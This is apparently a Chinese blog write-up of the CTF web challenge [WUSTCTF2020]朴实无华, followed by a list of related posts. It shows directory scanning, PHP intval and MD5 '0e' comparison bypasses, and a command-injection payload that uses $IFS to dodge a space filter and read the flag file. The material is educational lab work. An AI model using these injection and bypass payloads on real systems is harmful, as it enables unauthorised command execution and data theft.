[WUSTCTF2020]朴实无华1

最新推荐文章于 2024-08-04 16:36:09 发布
最新推荐文章于 2024-08-04 16:36:09 发布
阅读量216 收藏 2
点赞数 4
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kw741951/article/details/140902779
版权

打开题目

扫目录用dirsearch扫,为节省建议只扫常见的目录,配置是:

./dirsearch.py -e bak,zip,txt,tgz,php -u http:.....  -s 3 -t 20

访问一下

根据提示,再访问一次

提示不在这,抓包看看

根据提示,改get传参

找到源码,代码审计看看

GET方式传入三个参数

1.num:intval(num<2020)&&intval(num+1)>2021

intval函数获取字符(串)的数字,而如果参数是一个算术表达式,会先将所有的参数都化为数字,再进行数值计算

payload

1.num=2e4

2.md5=0e215962017

3.get_flag=ls试一下

关于tac

cat 和 tac 都是Linux打印文件的命令,但是cat是从第一行至最后一行顺序打印,而tac是最后一行至第一行反向打印。

本地测试

首先再一个文件夹中创建两个文件,flag和a.php

<?php
//a.php
 
    system("ls");
    echo "<br>";
    system("cat flag");
    echo "<br>"; 
    system("tac flag");
?>

payload3:get_flag=tac$IFS$9fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag

得到

flag{49729cf1-bd33-4d0f-9434-4f5a5d2f68bc}

worker..
关注
  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
note:就是一个朴实无华的笔记本
04-02
这个名为"note:就是一个朴实无华的笔记本"的压缩包文件,可能是某个开发者或学习者整理的关于特定主题——对数序列的学习资料。对数序列在数学和计算机科学中有着重要的应用,尤其是在算法分析和复杂度计算中。 ...
logseq:就是一个朴实无华的笔记本
03-29
1. **Markdown支持与纯文本编辑** logseq采用Markdown语法,让用户能够轻松地编写和格式化文本。Markdown是一种轻量级的标记语言,允许用户用简单的符号来控制文本样式,如加粗、斜体、标题、列表等,使内容更易读...
BUUCTF:[WUSTCTF2020]朴实无华
末初的CSDN博客
06-24 1076
首先在下发现 访问有一个假的flag,但是在响应头中找到一个提示,另外还有一个值得注意的是这里是 访问得到 PHP5中的函数中科学计数法符号无效,只会当作正常字符处理 所以这里利用科学计数法的符号就可以绕过level 1level 2直接可参考我的这篇文章:浅谈PHP中哈希比较缺陷问题及哈希强比较相关问题最后直接绕过和即可...
[WUSTCTF 2020]朴实无华
qq_61142406的博客
05-26 247
if (isset($_GET['num'])){ //num=1e10,类型转化 $num = $_GET['num']; if(intval($num) < 2020 && intval($num + 1) > 2021){ echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>"; }else{ die("金钱解决不了穷人的本质问题").
[WUSTCTF2020]朴实无华
m0_52432374的博客
05-04 398
[WUSTCTF2020]朴实无华 1
m0_62879498的博客
05-07 1352
[WUSTCTF2020]朴实无华 1 进入环境,什么也没有得到,估计就是需要我们进行目录扫描了 用dirsearch进行把爆破扫描 环境的问题,很多的环境在进行扫描的时候,如果访问过快,就会返回429 ,建议将线程数调小,否则会出现文件 429请况,影响结果 dirsearch.py -e bak,zip,tgz,txt -u https://target -t 30 我们尝试访问文件 访问 fAke_f1agggg.php 使用 bp抓包 查看情况 发现了新的文件,尝试访问 发现了朱
BUUCTF [WUSTCTF2020] 朴实无华
Senimo
12-16 1110
BUUCTF [WUSTCTF2020]朴实无华 考点: intval()函数科学计数法绕过 网页Unicode编码 变量md5()加密后与原值相等 nl、tac等替代cat命令 启动靶机: 根据标签名: <title>人间极乐bot</title> 猜测可能有robots.txt协议,访问: 得到假的flag: 根据之前的Warning: 猜测和请求头有关,使用BurpSuite抓取数据包: 在Response中发现新的提示: Look_at_me: /fl4g.p
[WUSTCTF2020]朴实无华(特详解)
热门推荐
qq_74806534的博客
02-08 2万+
=弱类型比较中,字符'0e123'和字符'0e456'虽然是字符类型,但是因为==比较不比较数据类型,只比较值,而值就是科学计数法的表示格式,结果都是0,所以相等,返回true ===强类型比较中,字符'0e123'和字符'0e456'在比较数据类型的时候就被当作字符类型,而字符'0e123'和字符'0e456'当然不相等,所以返回false。解释为科学记数法,表示 3 乘以 10 的 3 次方,即 3000,然后再加上 1,所以结果为 3001。他一开始说header有问题,不妨抓包看看,果然有东西。
buuctf-[WUSTCTF2020]朴实无华(小宇特详解)
小宇的web博客
02-23 1067
buuctf-[WUSTCTF2020]朴实无华(小宇特详解) 1.这里先看题目 2.然后去查看一下robots.txt,看一下爬虫规则。 3.提示是/fAke_f1agggg.php,这里访问并查看f12的网络 这里发现了/fl4g.php的提示,尝试访问 4.访问/fl4g.php,这里如果出现乱码问题请参考我的文章 (1条消息) 如何修复火狐浏览器的乱码问题(最新版)_小宇的web博客-CSDN博客 <?php header('Content-type:text/html;charset=
【BUUCTF】[WUSTCTF2020]朴实无华
aoao331198的博客
05-01 1623
为什么打开robots.txt,一是看见源码中有提示,二是应该在没有思路时作为常规操作 显示flag也不会在里面 打开这个文件,看见源码 <img src="/img.jpg"> <?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); //level 1 if (isset($_GET['num'])){ $num = $_GET.
[WUSTCTF2020]朴实无华_WP
Accompany的博客
02-12 3451
题目一览 文章目录题目一览分析获取flag标题Level 1Level 2get flag 分析 打开题目,除了hack me,没有得到可利用信息,查看源码 虽然编码有一点问题,但还是发现了这个利用点bot,想到robots.txt网站的爬虫规则 robots.txt置于网站的根目录下。爬虫根据此文件决定网站下的哪些页面是被授权抓取的 robots.txt 意为对任何爬虫,禁止其访问/fAke_f1agggg.php目录下的文件 但对于这个提示,我们明显是要访问看看有无可利用信息 /fAke_f
朴实无华的自我介绍精选.doc
10-11
朴实无华的自我介绍精选 本文档提供了一个完整的自我介绍示例,涵盖了个人基本信息、教育背景、工作经历、职业目标、个人性格等多个方面的内容。以下是本文档中所涉及的知识点: 1. 自我介绍的基本结构:自我介绍...
zapp:朴实无华的用作快速建造项目的基础库
03-19
为快速建造项目的基础库 开始 app := zapp . NewApp ( "test" ) app ....扩展性 组件 我们实现了一些组件,可以在找到 服务 我们实现了一些服务,可以在找到 ...作为一个基础库,我们尽量减少了依赖包,只需要以下包依赖 ...
1老王——学习ppt课件
11-23
- **朴实无华**:文章采用了朴素平实的语言风格,通过简洁明了的文字传达出深刻的情感。 - **细腻描写**:通过对老王外貌变化的细致描绘,如“面如死灰”、“眼睛上都结着一层翳”等,展现了老王生命的衰弱,同时也...
常见的CMS漏洞
lhdbk______的博客
08-03 538
常见的CMS漏洞
Android 发送短信功能
weixin_46107120的博客
08-04 260
输入短信内容和手机号码后,跳转到系统短信功能,然后点击发送即可。Android 发送短信功能。
Android笔试面试题AI答之广播(1)
学无止境,止于至善
08-04 485
Android广播机制提供了灵活的应用程序间和系统间的通信方式,通过不同的广播类型和注册方式,可以满足多种使用场景的需求。在使用广播时,应根据具体需求选择合适的广播类型和注册方式,并注意避免滥用广播机制导致性能问题。静态注册和动态注册各有优缺点,开发者应根据具体需求选择适合的注册方式。静态注册适用于需要长期监听广播且对广播接收时机要求不高的场景;而动态注册则适用于需要灵活控制接收器生命周期和接收条件的场景。同时,开发者还需要注意管理接收器的注册与注销过程,以避免内存泄漏和其他潜在问题。
Android】ContentProvider基本概念
最新发布
2303_79296612的博客
08-04 571
这是之前所学的东西,应用这个防止系统阻止我们监听开机广播其实用户主要在两个方面得到了保护。一方面,如果用户在低于Android 6.0系统的设备上安装该程序,会在安装界面给出提醒。这样用户就可以清楚地知晓该程序一共申请了哪些权限,从而决定是否要安装这个程序。另一方面,用户可以随时在应用程序管理界面查看任意一个程序的权限申请情况,这样该程序申请的所有权限就尽收眼底,什么都瞒不过用户的眼睛,以此保证应用程序不会出现各种滥用权限的情况。在Android 6.0系统中加入了运行时权限功能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值